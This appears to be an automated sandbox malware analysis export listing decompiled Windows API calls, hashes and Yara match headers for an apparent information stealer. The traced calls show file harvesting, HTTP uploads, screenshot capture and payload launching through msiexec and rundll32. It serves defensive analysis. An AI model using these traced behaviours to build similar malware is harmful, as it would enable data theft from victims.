                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 040AD1EA
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 040AD32E
                    • RtlAllocateHeap.NTDLL(00000000), ref: 040AD335
                    • lstrcat.KERNEL32(?,00000000), ref: 040AD46F
                    • lstrcat.KERNEL32(?,00421478), ref: 040AD47E
                    • lstrcat.KERNEL32(?,00000000), ref: 040AD491
                    • lstrcat.KERNEL32(?,0042147C), ref: 040AD4A0
                    • lstrcat.KERNEL32(?,00000000), ref: 040AD4B3
                    • lstrcat.KERNEL32(?,00421480), ref: 040AD4C2
                    • lstrcat.KERNEL32(?,00000000), ref: 040AD4D5
                    • lstrcat.KERNEL32(?,00421484), ref: 040AD4E4
                    • lstrcat.KERNEL32(?,00000000), ref: 040AD4F7
                    • lstrcat.KERNEL32(?,00421488), ref: 040AD506
                    • lstrcat.KERNEL32(?,00000000), ref: 040AD519
                    • lstrcat.KERNEL32(?,0042148C), ref: 040AD528
                    • lstrcat.KERNEL32(?,00000000), ref: 040AD53B
                    • lstrcat.KERNEL32(?,00421490), ref: 040AD54A
                      • Part of subcall function 040BAA87: lstrlen.KERNEL32(040A516C,?,?,040A516C,00420DDE), ref: 040BAA92
                      • Part of subcall function 040BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 040BAAEC
                    • lstrlen.KERNEL32(?), ref: 040AD591
                    • lstrlen.KERNEL32(?), ref: 040AD5A0
                    • memset.MSVCRT ref: 040AD5EF
                      • Part of subcall function 040BACD7: StrCmpCA.SHLWAPI(0064A350,040AAA0E,?,040AAA0E,0064A350), ref: 040BACF6
                    • DeleteFileA.KERNEL32(00000000), ref: 040AD61B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                    • String ID:
                    • API String ID: 1973479514-0
                    • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                    • Instruction ID: e2623fe34ebf5bfa4c91ba85ffe17aa3c8492cb51c60dda321cf3083f005ba64
                    • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                    • Instruction Fuzzy Hash: F5E16C75A50208ABDB08FBE4DD94EEE7379BF14309F504159E146B60A0DF34BA08CFA6
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,024B9798,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                    • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                    • lstrcatA.KERNEL32(?,00000000,024E9330,00421474,024E9330,00421470,00000000), ref: 0040D208
                    • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                    • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                    • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                    • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                    • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                    • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                    • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                    • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,024B6258,?,0042110C,?,00000000), ref: 0041A82B
                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                    • lstrlenA.KERNEL32(?), ref: 0040D32A
                    • lstrlenA.KERNEL32(?), ref: 0040D339
                    • memset.MSVCRT ref: 0040D388
                      • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                    • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                    • String ID:
                    • API String ID: 2775534915-0
                    • Opcode ID: dd183b9a0ed49ba793ecf7e40d148ba4ed28fb7071b52f16157b1b0084ccc920
                    • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                    • Opcode Fuzzy Hash: dd183b9a0ed49ba793ecf7e40d148ba4ed28fb7071b52f16157b1b0084ccc920
                    • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                    APIs
                      • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                      • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A51
                      • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A68
                      • Part of subcall function 040A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A7F
                      • Part of subcall function 040A4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 040A4AA0
                      • Part of subcall function 040A4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 040A4AB0
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 040A5C5F
                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 040A5C7A
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 040A5DFA
                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 040A60D8
                    • lstrlen.KERNEL32(00000000), ref: 040A60E9
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 040A60FA
                    • RtlAllocateHeap.NTDLL(00000000), ref: 040A6101
                    • lstrlen.KERNEL32(00000000), ref: 040A6116
                    • memcpy.MSVCRT(?,00000000,00000000), ref: 040A612D
                    • lstrlen.KERNEL32(00000000), ref: 040A613F
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 040A6158
                    • memcpy.MSVCRT(?), ref: 040A6165
                    • lstrlen.KERNEL32(00000000,?,?), ref: 040A6182
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 040A6196
                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 040A61B3
                    • InternetCloseHandle.WININET(00000000), ref: 040A6217
                    • InternetCloseHandle.WININET(00000000), ref: 040A6224
                    • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 040A5E5F
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                      • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                      • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                    • InternetCloseHandle.WININET(00000000), ref: 040A622E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                    • String ID:
                    • API String ID: 1703137719-0
                    • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                    • Instruction ID: 90d8003b19987e920682b0c2e9eae7ee79c5a2f7525ac9bbfa8060a151296c56
                    • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                    • Instruction Fuzzy Hash: A8123F71A20218ABDB15EBA0DD94FEEB379BF14708F504199E14672091EF743B88CF94
                    APIs
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                      • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                      • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 040ACCD3
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 040ACCF0
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 040ACCFC
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 040ACD0F
                    • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 040ACD1C
                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 040ACD40
                    • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 040ACD5E
                    • StrStrA.SHLWAPI(00000000,0064A364), ref: 040ACD85
                    • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 040ACF09
                    • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 040ACF20
                      • Part of subcall function 040ACA87: memset.MSVCRT ref: 040ACABA
                      • Part of subcall function 040ACA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 040ACAD8
                      • Part of subcall function 040ACA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 040ACAE3
                      • Part of subcall function 040ACA87: memcpy.MSVCRT(?,?,?), ref: 040ACB79
                    • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 040ACFC1
                    • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 040ACFD8
                      • Part of subcall function 040ACA87: lstrcat.KERNEL32(?,00420B46), ref: 040ACBAA
                      • Part of subcall function 040ACA87: lstrcat.KERNEL32(?,00420B47), ref: 040ACBBE
                      • Part of subcall function 040ACA87: lstrcat.KERNEL32(?,00420B4E), ref: 040ACBDF
                    • lstrlen.KERNEL32(00000000), ref: 040AD0AB
                    • CloseHandle.KERNEL32(00000000), ref: 040AD103
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                    • String ID:
                    • API String ID: 3555725114-3916222277
                    • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                    • Instruction ID: 238f985ba5ca777c0ca71609a4cac74fafe4f595f41c25ec3b0effec18902c05
                    • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                    • Instruction Fuzzy Hash: A7E12D72A10208ABDB15EBE4DD90EEEB779AF54308F044159F146B3191EF347A89CFA4
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,024EB888,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                    • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                    • StrStrA.SHLWAPI(?,024EB840,00420B52), ref: 0040CAF7
                    • StrStrA.SHLWAPI(00000000,024EB870), ref: 0040CB1E
                    • StrStrA.SHLWAPI(?,024EC1B0,00000000,?,00421458,00000000,?,00000000,00000000,?,024E9430,00000000,?,00421454,00000000,?), ref: 0040CCA2
                    • StrStrA.SHLWAPI(00000000,024EBFD0), ref: 0040CCB9
                      • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                      • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,024E92A0), ref: 0040C871
                      • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                      • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                    • StrStrA.SHLWAPI(?,024EBFD0,00000000,?,0042145C,00000000,?,00000000,024E92A0), ref: 0040CD5A
                    • StrStrA.SHLWAPI(00000000,024E9210), ref: 0040CD71
                      • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                      • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                      • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                    • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                    • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                    • String ID:
                    • API String ID: 3555725114-3916222277
                    • Opcode ID: 2438d76627bcbff543709c2f32cd44ca9ae5e95502dd009682462e2c21711f76
                    • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                    • Opcode Fuzzy Hash: 2438d76627bcbff543709c2f32cd44ca9ae5e95502dd009682462e2c21711f76
                    • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                    • RegOpenKeyExA.ADVAPI32(00000000,024B7078,00000000,00020019,00000000,004205B6), ref: 004183A4
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                    • wsprintfA.USER32 ref: 00418459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenlstrcpy$Enumwsprintf
                    • String ID: - $%s\%s$?
                    • API String ID: 3246050789-3278919252
                    • Opcode ID: 79a2fb80d974ac486e5468537c58b3e2968b3064256187bd92d5254366045701
                    • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                    • Opcode Fuzzy Hash: 79a2fb80d974ac486e5468537c58b3e2968b3064256187bd92d5254366045701
                    • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                    • memset.MSVCRT ref: 00410C1C
                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                    • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                    • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                    • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                    • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                    • lstrlenA.KERNEL32(?), ref: 00410CA7
                    • memset.MSVCRT ref: 00410CCD
                    • memset.MSVCRT ref: 00410CE1
                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,024B6258,?,0042110C,?,00000000), ref: 0041A82B
                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                      • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,024B9798,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                    • String ID: .exe
                    • API String ID: 1395395982-4119554291
                    • Opcode ID: 9d55e63f4d9d76d6cfe6b41b18adec1412689ce4735271c0c32cbc5a68951b40
                    • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                    • Opcode Fuzzy Hash: 9d55e63f4d9d76d6cfe6b41b18adec1412689ce4735271c0c32cbc5a68951b40
                    • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateGlobalStream
                    • String ID: image/jpeg
                    • API String ID: 2244384528-3785015651
                    • Opcode ID: 58e7ea74754b36ef7d8ae6683782e5e72f3db2d118764dcc0ce216f86dba9a95
                    • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                    • Opcode Fuzzy Hash: 58e7ea74754b36ef7d8ae6683782e5e72f3db2d118764dcc0ce216f86dba9a95
                    • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                    APIs
                    • strtok_s.MSVCRT ref: 00411307
                    • strtok_s.MSVCRT ref: 00411750
                      • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,024B6258,?,0042110C,?,00000000), ref: 0041A82B
                      • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: strtok_s$lstrcpylstrlen
                    • String ID:
                    • API String ID: 348468850-0
                    • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                    • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                    • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                    • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                    • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                    • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                    • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell$lstrcpy
                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                    • API String ID: 2507796910-3625054190
                    • Opcode ID: fa2f7c491e836ffa03b321dca4939e5102b2c3a10a2cb7c6d0d10a73c0b6426c
                    • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                    • Opcode Fuzzy Hash: fa2f7c491e836ffa03b321dca4939e5102b2c3a10a2cb7c6d0d10a73c0b6426c
                    • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                    APIs
                    • memset.MSVCRT ref: 040B4505
                    • memset.MSVCRT ref: 040B451C
                      • Part of subcall function 040B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 040B9072
                    • lstrcat.KERNEL32(?,00000000), ref: 040B4553
                    • lstrcat.KERNEL32(?,0064A30C), ref: 040B4572
                    • lstrcat.KERNEL32(?,?), ref: 040B4586
                    • lstrcat.KERNEL32(?,0064A5D8), ref: 040B459A
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                      • Part of subcall function 040B8FF7: GetFileAttributesA.KERNEL32(00000000,?,040A1DBB,?,?,00425654,?,?,00420E1F), ref: 040B9006
